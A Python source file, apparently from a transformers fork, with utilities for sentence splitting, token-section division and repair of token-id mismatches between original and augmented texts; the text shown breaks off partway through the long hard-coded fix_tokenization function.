| 7
|
90abd3953de1ce6ec2a4643428572260fa30674e
| 43,404
|
py
|
Python
|
code/transformers/src/transformers/data/augmentation_utils.py
|
lingo-mit/transformers
|
478fb18a9f9680321f0d37dc999ea444e9287cc0
|
[
"Apache-2.0"
] | null | null | null |
code/transformers/src/transformers/data/augmentation_utils.py
|
lingo-mit/transformers
|
478fb18a9f9680321f0d37dc999ea444e9287cc0
|
[
"Apache-2.0"
] | null | null | null |
code/transformers/src/transformers/data/augmentation_utils.py
|
lingo-mit/transformers
|
478fb18a9f9680321f0d37dc999ea444e9287cc0
|
[
"Apache-2.0"
] | null | null | null |
def convert_to_tokens(text, tokenizer, add_space=True):
    """
    Split *text* into whitespace-aware chunks suitable for tokenization.

    Words keep at most one leading space; any whitespace character other than
    a plain space (tab, newline, ...) becomes its own chunk.  When *add_space*
    is true and prepending a space to the first chunk does not change how many
    tokens *tokenizer* produces for it, a leading space is added so the first
    word tokenizes like a mid-sentence word.
    """
    pieces = []
    buf = ""
    for ch in text:
        if ch.isspace() and set(buf) != {" "}:
            # Close the current chunk before handling the whitespace char.
            if buf:
                pieces.append(buf)
                buf = ""
            if ch == " ":
                buf = " "          # a plain space starts the next chunk
            else:
                pieces.append(ch)  # other whitespace stands alone
        else:
            buf += ch
    if buf:
        pieces.append(buf)
    if add_space:
        if not pieces[0][0].isspace() and len(tokenizer.tokenize(pieces[0])) == len(tokenizer.tokenize(" " + pieces[0])):
            pieces[0] = " " + pieces[0]
    return pieces
# Sentence-boundary patterns used by convert_to_sentences.  Raw strings are
# used for every fragment containing a regex escape (\s, \d, ...) so they are
# not interpreted as (deprecated) string escape sequences; runtime values are
# unchanged.
ALPHABETS = r"([A-Za-z])"
PREFIXES = re.compile(r"(Mr|St|Mrs|Ms|Dr|Prof|Capt|Cpt|Lt|Mt)[.]")
SUFFIXES = r"(Inc|Ltd|Jr|Sr|Co)"
STARTERS = r"(Mr|Mrs|Ms|Dr|He\s|She\s|It\s|They\s|Their\s|Our\s|We\s|But\s|However\s|That\s|This\s|Wherever)"
ACRONYMS = r"([A-Z][.][A-Z][.](?:[A-Z][.])?)"
WEBSITES = re.compile(r"[.](com|net|org|io|gov|sj|bv|edu|ae)")
DIGITS = r"([0-9])"
ALPHABETS_1 = re.compile(r"\s" + ALPHABETS + "[.] ")
ALPHABETS_2 = re.compile(ALPHABETS + "[.]" + ALPHABETS + "[.]" + ALPHABETS + "[.]")
ALPHABETS_3 = re.compile(ALPHABETS + "[.]" + ALPHABETS + "[.]")
ALPHABETS_4 = re.compile(" " + ALPHABETS + "[.]")
ACRONYMS_1 = re.compile(ACRONYMS + " " + STARTERS)
SUFFIXES_1 = re.compile(" " + SUFFIXES + "[.] " + STARTERS)
SUFFIXES_2 = re.compile(" " + SUFFIXES + "[.]")
DIGITS_1 = re.compile("[.]" + DIGITS)
ENUMERATION_1 = re.compile("( [A-Za-z0-9] )" + "[.]")
ENUMERATION_2 = re.compile("([A-Za-z0-9])" + "[.]" + "([A-Za-z0-9]+)")
def convert_to_sentences(text, tokenizer):
    """
    Split raw *text* into a list of sentence strings.

    Adapted from https://stackoverflow.com/a/31505798.  Non-terminal periods
    (abbreviations, acronyms, decimals, websites, enumerations) are rewritten
    to the placeholder <prd>, sentence boundaries are marked with <stop>, the
    placeholders are restored, and the text is split on <stop>.
    """
    # Reconstruct the first whitespace-delimited word to decide whether a
    # leading space must be added so tokenization is not perturbed.
    first_word = ""
    for c in text:
        if c.isspace():
            break
        first_word += c
    if text[0] in ("'", "-") or first_word and len(tokenizer.tokenize(first_word)) != len(tokenizer.tokenize("." + first_word)) - 1:
        text = " " + text
    # Protect non-sentence-ending periods with <prd>.
    text = re.sub(PREFIXES, "\\1<prd>", text)
    text = re.sub(WEBSITES, "<prd>\\1", text)
    if "Ph.D" in text: text = text.replace("Ph.D.", "Ph<prd>D<prd>")
    text = re.sub(ALPHABETS_1," \\1<prd> ", text)
    text = re.sub(ACRONYMS_1, "\\1<stop> \\2", text)
    text = re.sub(ALPHABETS_2, "\\1<prd>\\2<prd>\\3<prd>", text)
    text = re.sub(ALPHABETS_3, "\\1<prd>\\2<prd>", text)
    text = re.sub(SUFFIXES_1, " \\1<prd><stop> \\2", text)
    text = re.sub(SUFFIXES_2, " \\1<prd>", text)
    text = re.sub(ALPHABETS_4, " \\1<prd>", text)
    text = re.sub(DIGITS_1, "<prd>\\1", text)
    text = re.sub(ENUMERATION_1, "\\1<prd>", text)
    text = re.sub(ENUMERATION_2, "\\1<prd>\\2", text)
    # Ellipses and other multi-dot runs are not sentence ends.
    text = text.replace(".....", "<prd><prd><prd><prd><prd>")
    text = text.replace("...", "<prd><prd><prd>")
    text = text.replace(".. ?", "<prd><prd> <qmark>")
    text = text.replace(".-", "<prd>-")
    text = text.replace("..", "<prd>.")
    text = text.replace(".@", "<prd>@")
    # Move terminal punctuation outside closing quotes so the <stop> marker
    # lands after the quote; the swap is undone per-sentence below.
    if "”" in text: text = text.replace(".”", "”.")
    if "\"" in text: text = text.replace(".\"", "\".")
    if "!" in text: text = text.replace("!\"", "\"!")
    if "?" in text: text = text.replace("?\"", "\"?")
    if "'" in text: text = text.replace(".'", "'.")
    if ".ep" in text: text = re.sub("[.](ep \d+)( , ep \d+)*", "<prd>\\1\\2<stop>", text)
    # Remaining ./?/! are real sentence ends; mark them and restore placeholders.
    text = text.replace(".", ".<stop>")
    text = text.replace("?", "?<stop>")
    text = text.replace("!", "!<stop>")
    text = text.replace("<prd>", ".")
    text = text.replace("<qmark>", "?")
    sentences = text.split("<stop>")
    for i in range(len(sentences)):
        # Undo the punctuation/quote swap performed above.
        if "”" in sentences[i]: sentences[i] = sentences[i].replace("”.", ".”")
        if "\"" in sentences[i]: sentences[i] = sentences[i].replace("\".", ".\"")
        if "!" in sentences[i]: sentences[i] = sentences[i].replace("\"!", "!\"")
        if "?" in sentences[i]: sentences[i] = sentences[i].replace("\"?", "?\"")
        if "'" in sentences[i]: sentences[i] = sentences[i].replace("'.", ".'")
    return sentences
def safe_string_get(s, i):
    """Return the element of *s* at index *i*, or False when out of range."""
    try:
        return s[i]
    except IndexError:
        return False
def divide_into_sections(tokenized_text, tokenizer, section_length):
    """
    Split *tokenized_text* into two parts near *section_length*.

    The cut point is nudged forward by one or two tokens when the decoded
    text around the boundary is a single character (optionally preceded by
    whitespace), so a character spanning several token ids is not torn apart.
    Returns (first_part_tokens, second_part_tokens).
    """
    def _boundary_is_clean(lo, hi):
        # True when the decoded span is one char, or whitespace + one char.
        # Decode is called per clause, mirroring the original short-circuiting.
        return (len(tokenizer.decode(tokenized_text[lo:hi])) == 1 or
                len(tokenizer.decode(tokenized_text[lo:hi])) == 2 and
                tokenizer.decode(tokenized_text[lo:hi])[0].isspace())

    if _boundary_is_clean(section_length - 1, section_length + 2):
        cut = section_length + 2
    elif _boundary_is_clean(section_length - 2, section_length + 1):
        cut = section_length + 1
    elif len(tokenizer.decode(tokenized_text[section_length - 1:section_length + 1])) == 1:
        cut = section_length + 1
    else:
        cut = section_length
    return tokenized_text[:cut], tokenized_text[cut:]
def divide_into_sections_fill(tokenized_text, tokenizer, section_length):
    """
    Like divide_into_sections, but measures *section_length* from the END of
    the token list: the second part receives roughly section_length tokens.
    The cut is nudged forward when the decoded boundary is a single character
    (optionally preceded by whitespace) so multi-token characters stay whole.
    Returns (first_part_tokens, second_part_tokens).
    """
    index = len(tokenized_text) - section_length

    def _boundary_is_clean(lo, hi):
        # True when the decoded span is one char, or whitespace + one char.
        # Decode is called per clause, mirroring the original short-circuiting.
        return (len(tokenizer.decode(tokenized_text[lo:hi])) == 1 or
                len(tokenizer.decode(tokenized_text[lo:hi])) == 2 and
                tokenizer.decode(tokenized_text[lo:hi])[0].isspace())

    if _boundary_is_clean(index - 1, index + 2):
        cut = index + 2
    elif _boundary_is_clean(index - 2, index + 1):
        cut = index + 1
    elif len(tokenizer.decode(tokenized_text[index - 1:index + 1])) == 1:
        cut = index + 1
    else:
        cut = index
    return tokenized_text[:cut], tokenized_text[cut:]
def check_tokenization(tokenized_text, tokenized_augmented_text, tokenizer, augmentation_function, size=None):
    """
    Align an augmented token-id list with the original token-id list.

    The adjustment depends on which family ``augmentation_function`` belongs
    to (PADDED_FUNCTIONS / FILL_FUNCTIONS / REPLACE_FUNCTIONS — module-level
    collections defined elsewhere in this file):
      * padded:  left-pad with <|paddingtoken|> ids up to the original length;
      * fill:    left-pad as needed, then keep only the trailing ``size``
                 tokens (size must be 1536 or 1024, otherwise ValueError);
      * replace: insert <|replacement|> ids wherever the augmented tokens
                 diverge from the originals, falling back to
                 fix_tokenization() when lengths still disagree.
    Returns the adjusted token-id list.
    """
    # if len(tokenized_augmented_text) > len(tokenized_text) and tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))[0] in tokenized_augmented_text:
    if (augmentation_function not in PADDED_FUNCTIONS and
            augmentation_function not in REPLACE_FUNCTIONS and
            tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))[0] in tokenized_augmented_text):
        # print(tokenized_augmented_text)
        # pass
        # Drop the leading token so the augmented stream lines up.
        tokenized_augmented_text = tokenized_augmented_text[1:]
    # print(tokenized_text[:6])
    # if tokenized_text[:6] == [118, 94, 782, 2540, 284, 37890]:
    #     print("FIRST TOKEN: \n\n\n\n\n\n\\n\n\n\n\n\n\n\n\n\n\n\n\n", tokenized_augmented_text[0])
    if augmentation_function in PADDED_FUNCTIONS:
        padding_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|paddingtoken|>"))
        while len(tokenized_augmented_text) < len(tokenized_text):
            tokenized_augmented_text = padding_token + tokenized_augmented_text
    if augmentation_function in FILL_FUNCTIONS:
        padding_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|paddingtoken|>"))
        if len(tokenized_augmented_text) < size:
            print("TOO SHORT")
            while len(tokenized_augmented_text) < len(tokenized_text):
                tokenized_augmented_text = padding_token + tokenized_augmented_text
        # Keep only the trailing window of the expected size.
        if size == 1536:
            tokenized_augmented_text = tokenized_augmented_text[-1536:]
        elif size == 1024:
            tokenized_augmented_text = tokenized_augmented_text[-1024:]
        else:
            raise ValueError("invalid augmentation function")
        return tokenized_augmented_text
    if augmentation_function in REPLACE_FUNCTIONS:
        debug = False
        if tokenized_text[0] == 8244:
            debug = True
            # print(len(tokenized_text))
            # print(len(tokenized_augmented_text))
            # print(tokenized_text)
            # print(tokenized_augmented_text)
            # assert False
        replacement_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|replacement|>"))
        end_of_augmented_text_token = tokenizer.convert_tokens_to_ids(tokenizer.tokenize("<|endofaugmentedtext|>"))[0]
        # Walk both streams in lockstep, inserting <|replacement|> ids where
        # the decoded tokens differ; stop at the end-of-augmented-text marker.
        i, j = 0, 0
        while i < len(tokenized_text) and j < len(tokenized_text):
            # if debug:
            #     print(tokenized_augmented_text[j], tokenized_text[i])
            if tokenized_augmented_text[j] == end_of_augmented_text_token and tokenizer.decode(tokenized_augmented_text[j+1]).strip() == tokenizer.decode(tokenized_text[i]).strip() and j >= 512:
                if tokenizer.decode(tokenized_augmented_text[j+1]).strip() == "":
                    if tokenized_augmented_text[j+1] == tokenized_text[i]:
                        break
                else:
                    break
                # tokenized_augmented_text = tokenized_augmented_text[:j] + replacement_token + tokenized_augmented_text[j:]
                # i += 1
                # j += 1
                # continue
            if tokenizer.decode(tokenized_text[i]).strip() != tokenizer.decode(tokenized_augmented_text[j]).strip():
                tokenized_augmented_text = tokenized_augmented_text[:j] + replacement_token + tokenized_augmented_text[j:]
            i += 1
            j += 1
        tokenized_augmented_text = tokenized_augmented_text[1:]
        # print(len(tokenized_text))
        if len(tokenized_augmented_text) != len(tokenized_text):
            # print(find_difference(tokenized_text, tokenized_augmented_text))
            # pass
            tokenized_augmented_text = fix_tokenization(tokenized_text, tokenized_augmented_text, tokenizer, augmentation_function)
        # NOTE(review): both branches below return the same value; the split
        # appears to be a leftover debugging scaffold.
        if len(tokenized_text) == len(tokenized_augmented_text):
            # print(len(tokenized_text))
            # print(len(tokenized_augmented_text))
            # print(tokenized_text)
            # print(tokenized_augmented_text)
            # assert False
            return tokenized_augmented_text
        else:
            return tokenized_augmented_text
    # print(len(tokenized_text))
    # print(len(tokenized_augmented_text))
    # print(tokenized_text)
    # print(tokenized_augmented_text)
    # assert False
    # return False
# Purpose: repair small length mismatches between `tokenized_text` (token ids of
# the original text) and `tokenized_augmented_text` (token ids of its augmented
# rewrite) caused by the tokenizer merging or splitting multi-byte characters
# differently in the two strings.  The hard-coded ids below are presumably
# GPT-2-style byte-level BPE ids -- TODO confirm against the tokenizer in use.
# Returns the adjusted augmented token list; the caller re-checks the lengths.
# NOTE(review): indentation has been stripped from this dump, so the original
# nesting of the branches below (in particular whether the special cases after
# the first group of loops sit inside the first `if`) is not recoverable here;
# every code line is kept byte-identical and only comments are added.
def fix_tokenization(tokenized_text, tokenized_augmented_text, tokenizer, augmentation_function):
# Branch 1: the augmented tokenization came out SHORTER than the original.
# Each loop re-expands one surplus occurrence of a "merged" id (20543, 4210,
# 6353, 1828, 10332) into the two-id spelling the original used; the extra
# `X in tokenized_text` guard selects which spelling to restore.
if len(tokenized_text) > len(tokenized_augmented_text):
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 2343 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [2343, 226] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 16268 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [16268, 249] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 19567 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 19567] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 10545 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [10545, 246] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 136 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 136] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 28053 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [28053, 120] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 133 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 133] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 156 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 156] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 27332 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [27332, 119] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 132 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 132] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 20015 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 20015] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 10263 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [10263, 227] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 134 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 134] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 130 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 130] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 27670 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 27670] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 5099 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 5099] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 26292 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 26292] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and 142 in tokenized_text:
index = tokenized_augmented_text.index(20543)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 142] + tokenized_augmented_text[index + 1:]
# Same expansion pattern for merged id 4210.
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 157 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [157, 118] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 156 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [156, 106] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 34247 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [220, 34247] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 161 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [161, 254] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 165 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [165, 253] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 162 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [162, 249] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 115 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [115, 253] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 163 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [163, 114] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 169 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [169, 247] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and 164 in tokenized_text:
index = tokenized_augmented_text.index(4210)
tokenized_augmented_text = tokenized_augmented_text[:index] + [164, 111] + tokenized_augmented_text[index + 1:]
# Same expansion pattern for merged id 6353.
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 98 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [98, 232] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 119 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [119, 229] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 224 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [224, 117] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 223 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [223, 226] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 99 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [99, 236] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 235 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [235, 119] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 115 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [115, 243] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 120 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [120, 242] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 252 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [252, 234] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 122 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [122, 110] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 253 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [253, 111] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 102 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [102, 109] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 226 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [226, 244] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 118 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [118, 96] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 225 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [225, 254] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 233 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [233, 227] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 123 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [123, 114] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 247 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [247, 101] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 255 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [255, 96] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and 112 in tokenized_text:
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + [112, 108] + tokenized_augmented_text[index + 1:]
# 1828 presumably encodes a doubled digit ("22" -> 2,2) and 10332 a two-id pair.
while tokenized_augmented_text.count(1828) > tokenized_text.count(1828) and 17 in tokenized_text:
index = tokenized_augmented_text.index(1828)
tokenized_augmented_text = tokenized_augmented_text[:index] + [17, 17] + tokenized_augmented_text[index + 1:]
while tokenized_augmented_text.count(10332) > tokenized_text.count(10332) and 519 in tokenized_text:
index = tokenized_augmented_text.index(10332)
tokenized_augmented_text = tokenized_augmented_text[:index] + [519, 70] + tokenized_augmented_text[index + 1:]
# Start-of-list / end-of-list special cases: a surplus merged id that decodes to
# the same string as the original's first (or last) tokens is replaced with the
# corresponding slice of the original.
if tokenized_augmented_text.count(6353) > tokenized_text.count(6353) and tokenizer.decode(tokenized_text[:2]) == tokenizer.decode(6353):
index = tokenized_augmented_text.index(6353)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_text[:2] + tokenized_augmented_text[index + 1:]
if tokenized_augmented_text.count(20543) > tokenized_text.count(20543) and tokenized_augmented_text[-1] == 20543:
tokenized_augmented_text = tokenized_augmented_text[:-1] + tokenized_text[-2:]
if tokenized_augmented_text.count(40670) > tokenized_text.count(40670) and tokenized_augmented_text[-1] == 40670:
tokenized_augmented_text = tokenized_augmented_text[:-1] + tokenized_text[-2:]
if tokenized_augmented_text.count(4210) > tokenized_text.count(4210) and tokenized_augmented_text[-1] == 4210:
tokenized_augmented_text = tokenized_augmented_text[:-1] + tokenized_text[-2:]
# Trailing-token restorations: append the missing continuation id when the
# augmented list ends on a known prefix id (156).
if tokenized_text.count(107) > tokenized_augmented_text.count(107) and tokenized_augmented_text[-1] == 156:
tokenized_augmented_text = tokenized_augmented_text + [107]
if tokenized_text.count(113) > tokenized_augmented_text.count(113) and tokenized_augmented_text[-1] == 156:
tokenized_augmented_text = tokenized_augmented_text + [113]
if tokenized_augmented_text[-1] == 156 and tokenized_text[-2] == 156:
tokenized_augmented_text = tokenized_augmented_text + tokenized_text[-1:]
if tokenized_augmented_text.count(48585) > tokenized_text.count(48585) and tokenizer.decode(tokenized_text[:3]) == tokenizer.decode(48585):
index = tokenized_augmented_text.index(48585)
tokenized_augmented_text = tokenized_augmented_text[:index] + tokenized_text[:3] + tokenized_augmented_text[index + 1:]
if tokenized_text.count(13) > tokenized_augmented_text.count(13) and tokenized_text[-3:] == [13, 163, 106]:
tokenized_augmented_text = tokenized_augmented_text[:-2] + [13, 163, 106]
# Branch 2: the augmented tokenization came out LONGER than the original.
# Each loop collapses a split multi-id spelling back into the single id the
# original used; the guard token is the first id of the split spelling, and the
# slice offsets (index-2 .. index+4) encode how many ids each side spans.
if len(tokenized_augmented_text) > len(tokenized_text):
while tokenized_text.count(34247) > tokenized_augmented_text.count(34247) and 12919 in tokenized_augmented_text:
index = tokenized_augmented_text.index(12919)
tokenized_augmented_text = tokenized_augmented_text[:index] + [34247] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(27032) > tokenized_augmented_text.count(27032) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [27032] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(15474) > tokenized_augmented_text.count(15474) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [15474] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(12045) > tokenized_augmented_text.count(12045) and 6312 in tokenized_augmented_text:
index = tokenized_augmented_text.index(6312)
tokenized_augmented_text = tokenized_augmented_text[:index] + [12045] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(127) > tokenized_augmented_text.count(127) and 157 in tokenized_augmented_text:
index = tokenized_augmented_text.index(157)
tokenized_augmented_text = tokenized_augmented_text[:index] + [127] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(33951) > tokenized_augmented_text.count(33951) and 25529 in tokenized_augmented_text:
index = tokenized_augmented_text.index(25529)
tokenized_augmented_text = tokenized_augmented_text[:index] + [33951] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(25443) > tokenized_augmented_text.count(25443) and 15166 in tokenized_augmented_text:
index = tokenized_augmented_text.index(15166)
tokenized_augmented_text = tokenized_augmented_text[:index] + [25443] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(234) > tokenized_augmented_text.count(234) and 10263 in tokenized_augmented_text:
index = tokenized_augmented_text.index(10263)
tokenized_augmented_text = tokenized_augmented_text[:index] + [234] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(2515) > tokenized_augmented_text.count(2515) and 163 in tokenized_augmented_text:
index = tokenized_augmented_text.index(163)
tokenized_augmented_text = tokenized_augmented_text[:index] + [2515] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(35050) > tokenized_augmented_text.count(35050) and 114 in tokenized_augmented_text:
index = tokenized_augmented_text.index(114)
tokenized_augmented_text = tokenized_augmented_text[:index] + [35050] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(17683) > tokenized_augmented_text.count(17683) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [17683] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(49149) > tokenized_augmented_text.count(49149) and 5641 in tokenized_augmented_text:
index = tokenized_augmented_text.index(5641)
tokenized_augmented_text = tokenized_augmented_text[:index] + [49149] + tokenized_augmented_text[index + 2:]
while tokenized_text.count(35050) > tokenized_augmented_text.count(35050) and 20543 in tokenized_augmented_text:
index = tokenized_augmented_text.index(20543)
